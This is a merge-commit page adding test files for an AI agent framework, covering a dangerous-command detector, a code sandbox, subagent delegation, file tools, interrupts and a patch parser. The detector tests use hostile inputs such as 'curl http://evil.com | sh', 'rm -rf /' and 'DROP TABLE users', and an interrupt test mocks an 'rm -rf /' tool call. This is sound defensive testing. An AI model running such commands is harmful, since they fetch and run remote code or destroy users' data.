Merge remote-tracking branch 'origin/main' into codex/align-codex-provider-conventions-mainrepo

# Conflicts:
#	cron/scheduler.py
#	gateway/run.py
#	tools/delegate_tool.py
This commit is contained in:
George Pickett 2026-02-26 10:56:29 -08:00
commit 32070e6bc0
61 changed files with 8482 additions and 244 deletions

0
tests/tools/__init__.py Normal file
View file

View file

@ -0,0 +1,95 @@
"""Tests for the dangerous command approval module."""
from tools.approval import (
approve_session,
clear_session,
detect_dangerous_command,
has_pending,
is_approved,
pop_pending,
submit_pending,
)
class TestDetectDangerousRm:
def test_rm_rf_detected(self):
is_dangerous, key, desc = detect_dangerous_command("rm -rf /home/user")
assert is_dangerous is True
assert desc is not None
def test_rm_recursive_long_flag(self):
is_dangerous, key, desc = detect_dangerous_command("rm --recursive /tmp/stuff")
assert is_dangerous is True
class TestDetectDangerousSudo:
def test_shell_via_c_flag(self):
is_dangerous, key, desc = detect_dangerous_command("bash -c 'echo pwned'")
assert is_dangerous is True
def test_curl_pipe_sh(self):
is_dangerous, key, desc = detect_dangerous_command("curl http://evil.com | sh")
assert is_dangerous is True
class TestDetectSqlPatterns:
def test_drop_table(self):
is_dangerous, _, desc = detect_dangerous_command("DROP TABLE users")
assert is_dangerous is True
def test_delete_without_where(self):
is_dangerous, _, desc = detect_dangerous_command("DELETE FROM users")
assert is_dangerous is True
def test_delete_with_where_safe(self):
is_dangerous, _, _ = detect_dangerous_command("DELETE FROM users WHERE id = 1")
assert is_dangerous is False
class TestSafeCommand:
def test_echo_is_safe(self):
is_dangerous, key, desc = detect_dangerous_command("echo hello world")
assert is_dangerous is False
assert key is None
def test_ls_is_safe(self):
is_dangerous, _, _ = detect_dangerous_command("ls -la /tmp")
assert is_dangerous is False
def test_git_is_safe(self):
is_dangerous, _, _ = detect_dangerous_command("git status")
assert is_dangerous is False
class TestSubmitAndPopPending:
def test_submit_and_pop(self):
key = "test_session_pending"
clear_session(key)
submit_pending(key, {"command": "rm -rf /", "pattern_key": "rm"})
assert has_pending(key) is True
approval = pop_pending(key)
assert approval["command"] == "rm -rf /"
assert has_pending(key) is False
def test_pop_empty_returns_none(self):
key = "test_session_empty"
clear_session(key)
assert pop_pending(key) is None
class TestApproveAndCheckSession:
def test_session_approval(self):
key = "test_session_approve"
clear_session(key)
assert is_approved(key, "rm") is False
approve_session(key, "rm")
assert is_approved(key, "rm") is True
def test_clear_session_removes_approvals(self):
key = "test_session_clear"
approve_session(key, "rm")
clear_session(key)
assert is_approved(key, "rm") is False

View file

@ -0,0 +1,218 @@
#!/usr/bin/env python3
"""
Tests for the code execution sandbox (programmatic tool calling).
These tests monkeypatch handle_function_call so they don't require API keys
or a running terminal backend. They verify the core sandbox mechanics:
UDS socket lifecycle, hermes_tools generation, timeout enforcement,
output capping, tool call counting, and error propagation.
Run with: python -m pytest tests/test_code_execution.py -v
or: python tests/test_code_execution.py
"""
import json
import sys
import time
import unittest
from unittest.mock import patch
from tools.code_execution_tool import (
SANDBOX_ALLOWED_TOOLS,
execute_code,
generate_hermes_tools_module,
check_sandbox_requirements,
EXECUTE_CODE_SCHEMA,
)
def _mock_handle_function_call(function_name, function_args, task_id=None, user_task=None):
"""Mock dispatcher that returns canned responses for each tool."""
if function_name == "terminal":
cmd = function_args.get("command", "")
return json.dumps({"output": f"mock output for: {cmd}", "exit_code": 0})
if function_name == "web_search":
return json.dumps({"results": [{"url": "https://example.com", "title": "Example", "description": "A test result"}]})
if function_name == "read_file":
return json.dumps({"content": "line 1\nline 2\nline 3\n", "total_lines": 3})
if function_name == "write_file":
return json.dumps({"status": "ok", "path": function_args.get("path", "")})
if function_name == "search":
return json.dumps({"matches": [{"file": "test.py", "line": 1, "text": "match"}]})
if function_name == "patch":
return json.dumps({"status": "ok", "replacements": 1})
if function_name == "web_extract":
return json.dumps("# Extracted content\nSome text from the page.")
return json.dumps({"error": f"Unknown tool in mock: {function_name}"})
class TestSandboxRequirements(unittest.TestCase):
def test_available_on_posix(self):
if sys.platform != "win32":
self.assertTrue(check_sandbox_requirements())
def test_schema_is_valid(self):
self.assertEqual(EXECUTE_CODE_SCHEMA["name"], "execute_code")
self.assertIn("code", EXECUTE_CODE_SCHEMA["parameters"]["properties"])
self.assertIn("code", EXECUTE_CODE_SCHEMA["parameters"]["required"])
class TestHermesToolsGeneration(unittest.TestCase):
def test_generates_all_allowed_tools(self):
src = generate_hermes_tools_module(list(SANDBOX_ALLOWED_TOOLS))
for tool in SANDBOX_ALLOWED_TOOLS:
self.assertIn(f"def {tool}(", src)
def test_generates_subset(self):
src = generate_hermes_tools_module(["terminal", "web_search"])
self.assertIn("def terminal(", src)
self.assertIn("def web_search(", src)
self.assertNotIn("def read_file(", src)
def test_empty_list_generates_nothing(self):
src = generate_hermes_tools_module([])
self.assertNotIn("def terminal(", src)
self.assertIn("def _call(", src) # infrastructure still present
def test_non_allowed_tools_ignored(self):
src = generate_hermes_tools_module(["vision_analyze", "terminal"])
self.assertIn("def terminal(", src)
self.assertNotIn("def vision_analyze(", src)
def test_rpc_infrastructure_present(self):
src = generate_hermes_tools_module(["terminal"])
self.assertIn("HERMES_RPC_SOCKET", src)
self.assertIn("AF_UNIX", src)
self.assertIn("def _connect(", src)
self.assertIn("def _call(", src)
@unittest.skipIf(sys.platform == "win32", "UDS not available on Windows")
class TestExecuteCode(unittest.TestCase):
"""Integration tests using the mock dispatcher."""
def _run(self, code, enabled_tools=None):
"""Helper: run code with mocked handle_function_call."""
with patch("tools.code_execution_tool._rpc_server_loop") as mock_rpc:
# Use real execution but mock the tool dispatcher
pass
# Actually run with full integration, mocking at the model_tools level
with patch("model_tools.handle_function_call", side_effect=_mock_handle_function_call):
result = execute_code(
code=code,
task_id="test-task",
enabled_tools=enabled_tools or list(SANDBOX_ALLOWED_TOOLS),
)
return json.loads(result)
def test_basic_print(self):
"""Script that just prints -- no tool calls."""
result = self._run('print("hello world")')
self.assertEqual(result["status"], "success")
self.assertIn("hello world", result["output"])
self.assertEqual(result["tool_calls_made"], 0)
def test_single_tool_call(self):
"""Script calls terminal and prints the result."""
code = """
from hermes_tools import terminal
result = terminal("echo hello")
print(result.get("output", ""))
"""
result = self._run(code)
self.assertEqual(result["status"], "success")
self.assertIn("mock output for: echo hello", result["output"])
self.assertEqual(result["tool_calls_made"], 1)
def test_multi_tool_chain(self):
"""Script calls multiple tools sequentially."""
code = """
from hermes_tools import terminal, read_file
r1 = terminal("ls")
r2 = read_file("test.py")
print(f"terminal: {r1['output'][:20]}")
print(f"file lines: {r2['total_lines']}")
"""
result = self._run(code)
self.assertEqual(result["status"], "success")
self.assertEqual(result["tool_calls_made"], 2)
def test_syntax_error(self):
"""Script with a syntax error returns error status."""
result = self._run("def broken(")
self.assertEqual(result["status"], "error")
self.assertIn("SyntaxError", result.get("error", "") + result.get("output", ""))
def test_runtime_exception(self):
"""Script with a runtime error returns error status."""
result = self._run("raise ValueError('test error')")
self.assertEqual(result["status"], "error")
def test_excluded_tool_returns_error(self):
"""Script calling a tool not in the allow-list gets an error from RPC."""
code = """
from hermes_tools import terminal
result = terminal("echo hi")
print(result)
"""
# Only enable web_search -- terminal should be excluded
result = self._run(code, enabled_tools=["web_search"])
# terminal won't be in hermes_tools.py, so import fails
self.assertEqual(result["status"], "error")
def test_empty_code(self):
"""Empty code string returns an error."""
result = json.loads(execute_code("", task_id="test"))
self.assertIn("error", result)
def test_output_captured(self):
"""Multiple print statements are captured in order."""
code = """
for i in range(5):
print(f"line {i}")
"""
result = self._run(code)
self.assertEqual(result["status"], "success")
for i in range(5):
self.assertIn(f"line {i}", result["output"])
def test_stderr_on_error(self):
"""Traceback from stderr is included in the response."""
code = """
import sys
print("before error")
raise RuntimeError("deliberate crash")
"""
result = self._run(code)
self.assertEqual(result["status"], "error")
self.assertIn("before error", result["output"])
self.assertIn("RuntimeError", result.get("error", "") + result.get("output", ""))
def test_timeout_enforcement(self):
"""Script that sleeps too long is killed."""
code = "import time; time.sleep(999)"
with patch("model_tools.handle_function_call", side_effect=_mock_handle_function_call):
# Override config to use a very short timeout
with patch("tools.code_execution_tool._load_config", return_value={"timeout": 2, "max_tool_calls": 50}):
result = json.loads(execute_code(
code=code,
task_id="test-task",
enabled_tools=list(SANDBOX_ALLOWED_TOOLS),
))
self.assertEqual(result["status"], "timeout")
self.assertIn("timed out", result.get("error", ""))
def test_web_search_tool(self):
"""Script calls web_search and processes results."""
code = """
from hermes_tools import web_search
results = web_search("test query")
print(f"Found {len(results.get('results', []))} results")
"""
result = self._run(code)
self.assertEqual(result["status"], "success")
self.assertIn("Found 1 results", result["output"])
if __name__ == "__main__":
unittest.main()

View file

@ -0,0 +1,260 @@
#!/usr/bin/env python3
"""
Tests for the subagent delegation tool.
Uses mock AIAgent instances to test the delegation logic without
requiring API keys or real LLM calls.
Run with: python -m pytest tests/test_delegate.py -v
or: python tests/test_delegate.py
"""
import json
import sys
import unittest
from unittest.mock import MagicMock, patch
from tools.delegate_tool import (
DELEGATE_BLOCKED_TOOLS,
DELEGATE_TASK_SCHEMA,
MAX_CONCURRENT_CHILDREN,
MAX_DEPTH,
check_delegate_requirements,
delegate_task,
_build_child_system_prompt,
_strip_blocked_tools,
)
def _make_mock_parent(depth=0):
"""Create a mock parent agent with the fields delegate_task expects."""
parent = MagicMock()
parent.base_url = "https://openrouter.ai/api/v1"
parent.api_key = "parent-key"
parent.provider = "openrouter"
parent.api_mode = "chat_completions"
parent.model = "anthropic/claude-sonnet-4"
parent.platform = "cli"
parent.providers_allowed = None
parent.providers_ignored = None
parent.providers_order = None
parent.provider_sort = None
parent._session_db = None
parent._delegate_depth = depth
parent._active_children = []
return parent
class TestDelegateRequirements(unittest.TestCase):
def test_always_available(self):
self.assertTrue(check_delegate_requirements())
def test_schema_valid(self):
self.assertEqual(DELEGATE_TASK_SCHEMA["name"], "delegate_task")
props = DELEGATE_TASK_SCHEMA["parameters"]["properties"]
self.assertIn("goal", props)
self.assertIn("tasks", props)
self.assertIn("context", props)
self.assertIn("toolsets", props)
self.assertIn("model", props)
self.assertIn("max_iterations", props)
self.assertEqual(props["tasks"]["maxItems"], 3)
class TestChildSystemPrompt(unittest.TestCase):
def test_goal_only(self):
prompt = _build_child_system_prompt("Fix the tests")
self.assertIn("Fix the tests", prompt)
self.assertIn("YOUR TASK", prompt)
self.assertNotIn("CONTEXT", prompt)
def test_goal_with_context(self):
prompt = _build_child_system_prompt("Fix the tests", "Error: assertion failed in test_foo.py line 42")
self.assertIn("Fix the tests", prompt)
self.assertIn("CONTEXT", prompt)
self.assertIn("assertion failed", prompt)
def test_empty_context_ignored(self):
prompt = _build_child_system_prompt("Do something", " ")
self.assertNotIn("CONTEXT", prompt)
class TestStripBlockedTools(unittest.TestCase):
def test_removes_blocked_toolsets(self):
result = _strip_blocked_tools(["terminal", "file", "delegation", "clarify", "memory", "code_execution"])
self.assertEqual(sorted(result), ["file", "terminal"])
def test_preserves_allowed_toolsets(self):
result = _strip_blocked_tools(["terminal", "file", "web", "browser"])
self.assertEqual(sorted(result), ["browser", "file", "terminal", "web"])
def test_empty_input(self):
result = _strip_blocked_tools([])
self.assertEqual(result, [])
class TestDelegateTask(unittest.TestCase):
def test_no_parent_agent(self):
result = json.loads(delegate_task(goal="test"))
self.assertIn("error", result)
self.assertIn("parent agent", result["error"])
def test_depth_limit(self):
parent = _make_mock_parent(depth=2)
result = json.loads(delegate_task(goal="test", parent_agent=parent))
self.assertIn("error", result)
self.assertIn("depth limit", result["error"].lower())
def test_no_goal_or_tasks(self):
parent = _make_mock_parent()
result = json.loads(delegate_task(parent_agent=parent))
self.assertIn("error", result)
def test_empty_goal(self):
parent = _make_mock_parent()
result = json.loads(delegate_task(goal=" ", parent_agent=parent))
self.assertIn("error", result)
def test_task_missing_goal(self):
parent = _make_mock_parent()
result = json.loads(delegate_task(tasks=[{"context": "no goal here"}], parent_agent=parent))
self.assertIn("error", result)
@patch("tools.delegate_tool._run_single_child")
def test_single_task_mode(self, mock_run):
mock_run.return_value = {
"task_index": 0, "status": "completed",
"summary": "Done!", "api_calls": 3, "duration_seconds": 5.0
}
parent = _make_mock_parent()
result = json.loads(delegate_task(goal="Fix tests", context="error log...", parent_agent=parent))
self.assertIn("results", result)
self.assertEqual(len(result["results"]), 1)
self.assertEqual(result["results"][0]["status"], "completed")
self.assertEqual(result["results"][0]["summary"], "Done!")
mock_run.assert_called_once()
@patch("tools.delegate_tool._run_single_child")
def test_batch_mode(self, mock_run):
mock_run.side_effect = [
{"task_index": 0, "status": "completed", "summary": "Result A", "api_calls": 2, "duration_seconds": 3.0},
{"task_index": 1, "status": "completed", "summary": "Result B", "api_calls": 4, "duration_seconds": 6.0},
]
parent = _make_mock_parent()
tasks = [
{"goal": "Research topic A"},
{"goal": "Research topic B"},
]
result = json.loads(delegate_task(tasks=tasks, parent_agent=parent))
self.assertIn("results", result)
self.assertEqual(len(result["results"]), 2)
self.assertEqual(result["results"][0]["summary"], "Result A")
self.assertEqual(result["results"][1]["summary"], "Result B")
self.assertIn("total_duration_seconds", result)
@patch("tools.delegate_tool._run_single_child")
def test_batch_capped_at_3(self, mock_run):
mock_run.return_value = {
"task_index": 0, "status": "completed",
"summary": "Done", "api_calls": 1, "duration_seconds": 1.0
}
parent = _make_mock_parent()
tasks = [{"goal": f"Task {i}"} for i in range(5)]
result = json.loads(delegate_task(tasks=tasks, parent_agent=parent))
# Should only run 3 tasks (MAX_CONCURRENT_CHILDREN)
self.assertEqual(mock_run.call_count, 3)
@patch("tools.delegate_tool._run_single_child")
def test_batch_ignores_toplevel_goal(self, mock_run):
"""When tasks array is provided, top-level goal/context/toolsets are ignored."""
mock_run.return_value = {
"task_index": 0, "status": "completed",
"summary": "Done", "api_calls": 1, "duration_seconds": 1.0
}
parent = _make_mock_parent()
result = json.loads(delegate_task(
goal="This should be ignored",
tasks=[{"goal": "Actual task"}],
parent_agent=parent,
))
# The mock was called with the tasks array item, not the top-level goal
call_args = mock_run.call_args
self.assertEqual(call_args.kwargs.get("goal") or call_args[1].get("goal", call_args[0][1] if len(call_args[0]) > 1 else None), "Actual task")
@patch("tools.delegate_tool._run_single_child")
def test_failed_child_included_in_results(self, mock_run):
mock_run.return_value = {
"task_index": 0, "status": "error",
"summary": None, "error": "Something broke",
"api_calls": 0, "duration_seconds": 0.5
}
parent = _make_mock_parent()
result = json.loads(delegate_task(goal="Break things", parent_agent=parent))
self.assertEqual(result["results"][0]["status"], "error")
self.assertIn("Something broke", result["results"][0]["error"])
def test_depth_increments(self):
"""Verify child gets parent's depth + 1."""
parent = _make_mock_parent(depth=0)
with patch("run_agent.AIAgent") as MockAgent:
mock_child = MagicMock()
mock_child.run_conversation.return_value = {
"final_response": "done", "completed": True, "api_calls": 1
}
MockAgent.return_value = mock_child
delegate_task(goal="Test depth", parent_agent=parent)
self.assertEqual(mock_child._delegate_depth, 1)
def test_active_children_tracking(self):
"""Verify children are registered/unregistered for interrupt propagation."""
parent = _make_mock_parent(depth=0)
with patch("run_agent.AIAgent") as MockAgent:
mock_child = MagicMock()
mock_child.run_conversation.return_value = {
"final_response": "done", "completed": True, "api_calls": 1
}
MockAgent.return_value = mock_child
delegate_task(goal="Test tracking", parent_agent=parent)
self.assertEqual(len(parent._active_children), 0)
def test_child_inherits_runtime_credentials(self):
parent = _make_mock_parent(depth=0)
parent.base_url = "https://chatgpt.com/backend-api/codex"
parent.api_key = "codex-token"
parent.provider = "openai-codex"
parent.api_mode = "codex_responses"
with patch("run_agent.AIAgent") as MockAgent:
mock_child = MagicMock()
mock_child.run_conversation.return_value = {
"final_response": "ok",
"completed": True,
"api_calls": 1,
}
MockAgent.return_value = mock_child
delegate_task(goal="Test runtime inheritance", parent_agent=parent)
_, kwargs = MockAgent.call_args
self.assertEqual(kwargs["base_url"], parent.base_url)
self.assertEqual(kwargs["api_key"], parent.api_key)
self.assertEqual(kwargs["provider"], parent.provider)
self.assertEqual(kwargs["api_mode"], parent.api_mode)
class TestBlockedTools(unittest.TestCase):
def test_blocked_tools_constant(self):
for tool in ["delegate_task", "clarify", "memory", "send_message", "execute_code"]:
self.assertIn(tool, DELEGATE_BLOCKED_TOOLS)
def test_constants(self):
self.assertEqual(MAX_CONCURRENT_CHILDREN, 3)
self.assertEqual(MAX_DEPTH, 2)
if __name__ == "__main__":
unittest.main()

View file

@ -0,0 +1,202 @@
"""Tests for the file tools module (schema, handler wiring, error paths).
Tests verify tool schemas, handler dispatch, validation logic, and error
handling without requiring a running terminal environment.
"""
import json
from unittest.mock import MagicMock, patch
from tools.file_tools import (
FILE_TOOLS,
READ_FILE_SCHEMA,
WRITE_FILE_SCHEMA,
PATCH_SCHEMA,
SEARCH_FILES_SCHEMA,
)
class TestFileToolsList:
def test_has_expected_entries(self):
names = {t["name"] for t in FILE_TOOLS}
assert names == {"read_file", "write_file", "patch", "search_files"}
def test_each_entry_has_callable_function(self):
for tool in FILE_TOOLS:
assert callable(tool["function"]), f"{tool['name']} missing callable"
def test_schemas_have_required_fields(self):
"""All schemas must have name, description, and parameters with properties."""
for schema in [READ_FILE_SCHEMA, WRITE_FILE_SCHEMA, PATCH_SCHEMA, SEARCH_FILES_SCHEMA]:
assert "name" in schema
assert "description" in schema
assert "properties" in schema["parameters"]
class TestReadFileHandler:
@patch("tools.file_tools._get_file_ops")
def test_returns_file_content(self, mock_get):
mock_ops = MagicMock()
result_obj = MagicMock()
result_obj.to_dict.return_value = {"content": "line1\nline2", "total_lines": 2}
mock_ops.read_file.return_value = result_obj
mock_get.return_value = mock_ops
from tools.file_tools import read_file_tool
result = json.loads(read_file_tool("/tmp/test.txt"))
assert result["content"] == "line1\nline2"
assert result["total_lines"] == 2
mock_ops.read_file.assert_called_once_with("/tmp/test.txt", 1, 500)
@patch("tools.file_tools._get_file_ops")
def test_custom_offset_and_limit(self, mock_get):
mock_ops = MagicMock()
result_obj = MagicMock()
result_obj.to_dict.return_value = {"content": "line10", "total_lines": 50}
mock_ops.read_file.return_value = result_obj
mock_get.return_value = mock_ops
from tools.file_tools import read_file_tool
read_file_tool("/tmp/big.txt", offset=10, limit=20)
mock_ops.read_file.assert_called_once_with("/tmp/big.txt", 10, 20)
@patch("tools.file_tools._get_file_ops")
def test_exception_returns_error_json(self, mock_get):
mock_get.side_effect = RuntimeError("terminal not available")
from tools.file_tools import read_file_tool
result = json.loads(read_file_tool("/tmp/test.txt"))
assert "error" in result
assert "terminal not available" in result["error"]
class TestWriteFileHandler:
@patch("tools.file_tools._get_file_ops")
def test_writes_content(self, mock_get):
mock_ops = MagicMock()
result_obj = MagicMock()
result_obj.to_dict.return_value = {"status": "ok", "path": "/tmp/out.txt", "bytes": 13}
mock_ops.write_file.return_value = result_obj
mock_get.return_value = mock_ops
from tools.file_tools import write_file_tool
result = json.loads(write_file_tool("/tmp/out.txt", "hello world!\n"))
assert result["status"] == "ok"
mock_ops.write_file.assert_called_once_with("/tmp/out.txt", "hello world!\n")
@patch("tools.file_tools._get_file_ops")
def test_exception_returns_error_json(self, mock_get):
mock_get.side_effect = PermissionError("read-only filesystem")
from tools.file_tools import write_file_tool
result = json.loads(write_file_tool("/tmp/out.txt", "data"))
assert "error" in result
assert "read-only" in result["error"]
class TestPatchHandler:
@patch("tools.file_tools._get_file_ops")
def test_replace_mode_calls_patch_replace(self, mock_get):
mock_ops = MagicMock()
result_obj = MagicMock()
result_obj.to_dict.return_value = {"status": "ok", "replacements": 1}
mock_ops.patch_replace.return_value = result_obj
mock_get.return_value = mock_ops
from tools.file_tools import patch_tool
result = json.loads(patch_tool(
mode="replace", path="/tmp/f.py",
old_string="foo", new_string="bar"
))
assert result["status"] == "ok"
mock_ops.patch_replace.assert_called_once_with("/tmp/f.py", "foo", "bar", False)
@patch("tools.file_tools._get_file_ops")
def test_replace_mode_replace_all_flag(self, mock_get):
mock_ops = MagicMock()
result_obj = MagicMock()
result_obj.to_dict.return_value = {"status": "ok", "replacements": 5}
mock_ops.patch_replace.return_value = result_obj
mock_get.return_value = mock_ops
from tools.file_tools import patch_tool
patch_tool(mode="replace", path="/tmp/f.py",
old_string="x", new_string="y", replace_all=True)
mock_ops.patch_replace.assert_called_once_with("/tmp/f.py", "x", "y", True)
@patch("tools.file_tools._get_file_ops")
def test_replace_mode_missing_path_errors(self, mock_get):
from tools.file_tools import patch_tool
result = json.loads(patch_tool(mode="replace", path=None, old_string="a", new_string="b"))
assert "error" in result
@patch("tools.file_tools._get_file_ops")
def test_replace_mode_missing_strings_errors(self, mock_get):
from tools.file_tools import patch_tool
result = json.loads(patch_tool(mode="replace", path="/tmp/f.py", old_string=None, new_string="b"))
assert "error" in result
@patch("tools.file_tools._get_file_ops")
def test_patch_mode_calls_patch_v4a(self, mock_get):
mock_ops = MagicMock()
result_obj = MagicMock()
result_obj.to_dict.return_value = {"status": "ok", "operations": 1}
mock_ops.patch_v4a.return_value = result_obj
mock_get.return_value = mock_ops
from tools.file_tools import patch_tool
result = json.loads(patch_tool(mode="patch", patch="*** Begin Patch\n..."))
assert result["status"] == "ok"
mock_ops.patch_v4a.assert_called_once()
@patch("tools.file_tools._get_file_ops")
def test_patch_mode_missing_content_errors(self, mock_get):
from tools.file_tools import patch_tool
result = json.loads(patch_tool(mode="patch", patch=None))
assert "error" in result
@patch("tools.file_tools._get_file_ops")
def test_unknown_mode_errors(self, mock_get):
from tools.file_tools import patch_tool
result = json.loads(patch_tool(mode="invalid_mode"))
assert "error" in result
assert "Unknown mode" in result["error"]
class TestSearchHandler:
@patch("tools.file_tools._get_file_ops")
def test_search_calls_file_ops(self, mock_get):
mock_ops = MagicMock()
result_obj = MagicMock()
result_obj.to_dict.return_value = {"matches": ["file1.py:3:match"]}
mock_ops.search.return_value = result_obj
mock_get.return_value = mock_ops
from tools.file_tools import search_tool
result = json.loads(search_tool(pattern="TODO", target="content", path="."))
assert "matches" in result
mock_ops.search.assert_called_once()
@patch("tools.file_tools._get_file_ops")
def test_search_passes_all_params(self, mock_get):
mock_ops = MagicMock()
result_obj = MagicMock()
result_obj.to_dict.return_value = {"matches": []}
mock_ops.search.return_value = result_obj
mock_get.return_value = mock_ops
from tools.file_tools import search_tool
search_tool(pattern="class", target="files", path="/src",
file_glob="*.py", limit=10, offset=5, output_mode="count", context=2)
mock_ops.search.assert_called_once_with(
pattern="class", path="/src", target="files", file_glob="*.py",
limit=10, offset=5, output_mode="count", context=2,
)
@patch("tools.file_tools._get_file_ops")
def test_search_exception_returns_error(self, mock_get):
mock_get.side_effect = RuntimeError("no terminal")
from tools.file_tools import search_tool
result = json.loads(search_tool(pattern="x"))
assert "error" in result

View file

@ -0,0 +1,67 @@
"""Tests for the fuzzy matching module."""
from tools.fuzzy_match import fuzzy_find_and_replace
class TestExactMatch:
def test_single_replacement(self):
content = "hello world"
new, count, err = fuzzy_find_and_replace(content, "hello", "hi")
assert err is None
assert count == 1
assert new == "hi world"
def test_no_match(self):
content = "hello world"
new, count, err = fuzzy_find_and_replace(content, "xyz", "abc")
assert count == 0
assert err is not None
assert new == content
def test_empty_old_string(self):
new, count, err = fuzzy_find_and_replace("abc", "", "x")
assert count == 0
assert err is not None
def test_identical_strings(self):
new, count, err = fuzzy_find_and_replace("abc", "abc", "abc")
assert count == 0
assert "identical" in err
def test_multiline_exact(self):
content = "line1\nline2\nline3"
new, count, err = fuzzy_find_and_replace(content, "line1\nline2", "replaced")
assert err is None
assert count == 1
assert new == "replaced\nline3"
class TestWhitespaceDifference:
def test_extra_spaces_match(self):
content = "def foo( x, y ):"
new, count, err = fuzzy_find_and_replace(content, "def foo( x, y ):", "def bar(x, y):")
assert count == 1
assert "bar" in new
class TestIndentDifference:
def test_different_indentation(self):
content = " def foo():\n pass"
new, count, err = fuzzy_find_and_replace(content, "def foo():\n pass", "def bar():\n return 1")
assert count == 1
assert "bar" in new
class TestReplaceAll:
def test_multiple_matches_without_flag_errors(self):
content = "aaa bbb aaa"
new, count, err = fuzzy_find_and_replace(content, "aaa", "ccc", replace_all=False)
assert count == 0
assert "Found 2 matches" in err
def test_multiple_matches_with_flag(self):
content = "aaa bbb aaa"
new, count, err = fuzzy_find_and_replace(content, "aaa", "ccc", replace_all=True)
assert err is None
assert count == 2
assert new == "ccc bbb ccc"

View file

@ -0,0 +1,221 @@
"""Tests for the interrupt system.
Run with: python -m pytest tests/test_interrupt.py -v
"""
import queue
import threading
import time
import pytest
# ---------------------------------------------------------------------------
# Unit tests: shared interrupt module
# ---------------------------------------------------------------------------
class TestInterruptModule:
"""Tests for tools/interrupt.py"""
def test_set_and_check(self):
from tools.interrupt import set_interrupt, is_interrupted
set_interrupt(False)
assert not is_interrupted()
set_interrupt(True)
assert is_interrupted()
set_interrupt(False)
assert not is_interrupted()
def test_thread_safety(self):
"""Set from one thread, check from another."""
from tools.interrupt import set_interrupt, is_interrupted
set_interrupt(False)
seen = {"value": False}
def _checker():
while not is_interrupted():
time.sleep(0.01)
seen["value"] = True
t = threading.Thread(target=_checker, daemon=True)
t.start()
time.sleep(0.05)
assert not seen["value"]
set_interrupt(True)
t.join(timeout=1)
assert seen["value"]
set_interrupt(False)
# ---------------------------------------------------------------------------
# Unit tests: pre-tool interrupt check
# ---------------------------------------------------------------------------
class TestPreToolCheck:
"""Verify that _execute_tool_calls skips all tools when interrupted."""
def test_all_tools_skipped_when_interrupted(self):
"""Mock an interrupted agent and verify no tools execute."""
from unittest.mock import MagicMock, patch
# Build a fake assistant_message with 3 tool calls
tc1 = MagicMock()
tc1.id = "tc_1"
tc1.function.name = "terminal"
tc1.function.arguments = '{"command": "rm -rf /"}'
tc2 = MagicMock()
tc2.id = "tc_2"
tc2.function.name = "terminal"
tc2.function.arguments = '{"command": "echo hello"}'
tc3 = MagicMock()
tc3.id = "tc_3"
tc3.function.name = "web_search"
tc3.function.arguments = '{"query": "test"}'
assistant_msg = MagicMock()
assistant_msg.tool_calls = [tc1, tc2, tc3]
messages = []
# Create a minimal mock agent with _interrupt_requested = True
agent = MagicMock()
agent._interrupt_requested = True
agent.log_prefix = ""
agent._log_msg_to_db = MagicMock()
# Import and call the method
from run_agent import AIAgent
# Bind the real method to our mock
AIAgent._execute_tool_calls(agent, assistant_msg, messages, "default")
# All 3 should be skipped
assert len(messages) == 3
for msg in messages:
assert msg["role"] == "tool"
assert "cancelled" in msg["content"].lower() or "interrupted" in msg["content"].lower()
# No actual tool handlers should have been called
# (handle_function_call should NOT have been invoked)
# ---------------------------------------------------------------------------
# Unit tests: message combining
# ---------------------------------------------------------------------------
class TestMessageCombining:
"""Verify multiple interrupt messages are joined."""
def test_cli_interrupt_queue_drain(self):
"""Simulate draining multiple messages from the interrupt queue."""
q = queue.Queue()
q.put("Stop!")
q.put("Don't delete anything")
q.put("Show me what you were going to delete instead")
parts = []
while not q.empty():
try:
msg = q.get_nowait()
if msg:
parts.append(msg)
except queue.Empty:
break
combined = "\n".join(parts)
assert "Stop!" in combined
assert "Don't delete anything" in combined
assert "Show me what you were going to delete instead" in combined
assert combined.count("\n") == 2
def test_gateway_pending_messages_append(self):
"""Simulate gateway _pending_messages append logic."""
pending = {}
key = "agent:main:telegram:dm"
# First message
if key in pending:
pending[key] += "\n" + "Stop!"
else:
pending[key] = "Stop!"
# Second message
if key in pending:
pending[key] += "\n" + "Do something else instead"
else:
pending[key] = "Do something else instead"
assert pending[key] == "Stop!\nDo something else instead"
# ---------------------------------------------------------------------------
# Integration tests (require local terminal)
# ---------------------------------------------------------------------------
class TestSIGKILLEscalation:
"""Test that SIGTERM-resistant processes get SIGKILL'd."""
@pytest.mark.skipif(
not __import__("shutil").which("bash"),
reason="Requires bash"
)
def test_sigterm_trap_killed_within_2s(self):
"""A process that traps SIGTERM should be SIGKILL'd after 1s grace."""
from tools.interrupt import set_interrupt
from tools.environments.local import LocalEnvironment
set_interrupt(False)
env = LocalEnvironment(cwd="/tmp", timeout=30)
# Start execution in a thread, interrupt after 0.5s
result_holder = {"value": None}
def _run():
result_holder["value"] = env.execute(
"trap '' TERM; sleep 60",
timeout=30,
)
t = threading.Thread(target=_run)
t.start()
time.sleep(0.5)
set_interrupt(True)
t.join(timeout=5)
set_interrupt(False)
assert result_holder["value"] is not None
assert result_holder["value"]["returncode"] == 130
assert "interrupted" in result_holder["value"]["output"].lower()
# ---------------------------------------------------------------------------
# Manual smoke test checklist (not automated)
# ---------------------------------------------------------------------------
SMOKE_TESTS = """
Manual Smoke Test Checklist:
1. CLI: Run `hermes`, ask it to `sleep 30` in terminal, type "stop" + Enter.
Expected: command dies within 2s, agent responds to "stop".
2. CLI: Ask it to extract content from 5 URLs, type interrupt mid-way.
Expected: remaining URLs are skipped, partial results returned.
3. Gateway (Telegram): Send a long task, then send "Stop".
Expected: agent stops and responds acknowledging the stop.
4. Gateway (Telegram): Send "Stop" then "Do X instead" rapidly.
Expected: both messages appear as the next prompt (joined by newline).
5. CLI: Start a task that generates 3+ tool calls in one batch.
Type interrupt during the first tool call.
Expected: only 1 tool executes, remaining are skipped.
"""

View file

@ -0,0 +1,139 @@
"""Tests for the V4A patch format parser."""
from tools.patch_parser import (
OperationType,
parse_v4a_patch,
)
class TestParseUpdateFile:
def test_basic_update(self):
patch = """\
*** Begin Patch
*** Update File: src/main.py
@@ def greet @@
def greet():
- print("hello")
+ print("hi")
*** End Patch"""
ops, err = parse_v4a_patch(patch)
assert err is None
assert len(ops) == 1
op = ops[0]
assert op.operation == OperationType.UPDATE
assert op.file_path == "src/main.py"
assert len(op.hunks) == 1
hunk = op.hunks[0]
assert hunk.context_hint == "def greet"
prefixes = [l.prefix for l in hunk.lines]
assert " " in prefixes
assert "-" in prefixes
assert "+" in prefixes
def test_multiple_hunks(self):
patch = """\
*** Begin Patch
*** Update File: f.py
@@ first @@
a
-b
